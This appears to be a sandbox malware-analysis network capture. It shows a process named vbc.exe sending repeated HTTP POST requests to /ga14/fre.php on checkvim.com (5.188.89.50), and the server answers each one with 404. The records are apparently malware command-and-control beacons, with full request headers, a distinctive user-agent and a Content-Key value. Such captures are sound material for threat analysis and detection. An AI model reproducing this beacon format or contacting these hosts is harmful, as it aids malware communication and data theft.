                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    4 | 192.168.2.22 | 49169 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:31.556288004 CEST | 224 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:31.912451982 CEST | 225 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:43 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    40 | 192.168.2.22 | 49205 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:59.242790937 CEST | 274 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:59.601229906 CEST | 275 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:10 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    41 | 192.168.2.22 | 49206 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:59.885917902 CEST | 275 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:00.245923042 CEST | 276 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:11 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    42 | 192.168.2.22 | 49207 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:00.541294098 CEST | 277 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:00.899846077 CEST | 277 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:12 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    43 | 192.168.2.22 | 49208 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:01.193569899 CEST | 278 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:01.549926996 CEST | 279 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:12 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    44 | 192.168.2.22 | 49209 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:01.859268904 CEST | 279 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:02.235016108 CEST | 280 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:13 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    45 | 192.168.2.22 | 49210 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:02.517045021 CEST | 281 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:02.885140896 CEST | 281 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:14 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    46 | 192.168.2.22 | 49211 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:03.156872988 CEST | 282 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:03.512490034 CEST | 283 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:14 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    47 | 192.168.2.22 | 49212 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:03.819480896 CEST | 284 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:04.183722019 CEST | 284 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:15 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    48 | 192.168.2.22 | 49213 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:04.459249020 CEST | 285 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:04.832232952 CEST | 286 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:16 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    49 | 192.168.2.22 | 49214 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:05.091180086 CEST | 286 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:05.442714930 CEST | 287 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:16 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    5 | 192.168.2.22 | 49170 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:33.578149080 CEST | 225 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:33.930838108 CEST | 226 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:45 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    50 | 192.168.2.22 | 49215 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:05.699796915 CEST | 288 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:06.041812897 CEST | 288 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:17 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    51 | 192.168.2.22 | 49216 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:06.324511051 CEST | 289 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:06.690603018 CEST | 290 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:18 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    52 | 192.168.2.22 | 49217 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:06.958702087 CEST | 291 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:07.319648027 CEST | 291 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:18 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    53 | 192.168.2.22 | 49218 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:07.603166103 CEST | 292 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:07.964447021 CEST | 293 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:19 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    54 | 192.168.2.22 | 49219 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:08.233326912 CEST | 293 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:08.589641094 CEST | 294 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:19 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    55 | 192.168.2.22 | 49220 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:08.841041088 CEST | 295 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:09.186378002 CEST | 295 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:20 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    56 | 192.168.2.22 | 49221 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:09.444019079 CEST | 296 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:09.822865009 CEST | 297 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:21 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    57 | 192.168.2.22 | 49222 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:10.077282906 CEST | 298 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:10.430119991 CEST | 298 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:21 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    58 | 192.168.2.22 | 49223 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:10.687077999 CEST | 299 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:11.051527977 CEST | 299 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:22 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    59 | 192.168.2.22 | 49224 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:11.328728914 CEST | 300 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:11.678843021 CEST | 301 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:23 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    6 | 192.168.2.22 | 49171 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:36.333899975 CEST | 227 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:36.694550991 CEST | 227 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:48 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    60 | 192.168.2.22 | 49225 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:11.924108982 CEST | 302 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:12.290452957 CEST | 302 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:23 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    61 | 192.168.2.22 | 49226 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:12.548479080 CEST | 303 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:12.908385992 CEST | 304 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:24 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    62 | 192.168.2.22 | 49227 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:13.189129114 CEST | 304 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:13.544517994 CEST | 305 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:24 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    63 | 192.168.2.22 | 49228 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:13.815165043 CEST | 306 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:14.177795887 CEST | 306 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:25 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    64 | 192.168.2.22 | 49229 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:14.436115026 CEST | 307 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:14.799664974 CEST | 308 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:26 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    65 | 192.168.2.22 | 49230 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:51:15.070584059 CEST | 309 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:15.439943075 CEST | 309 | IN | HTTP/1.0 404 Not Found
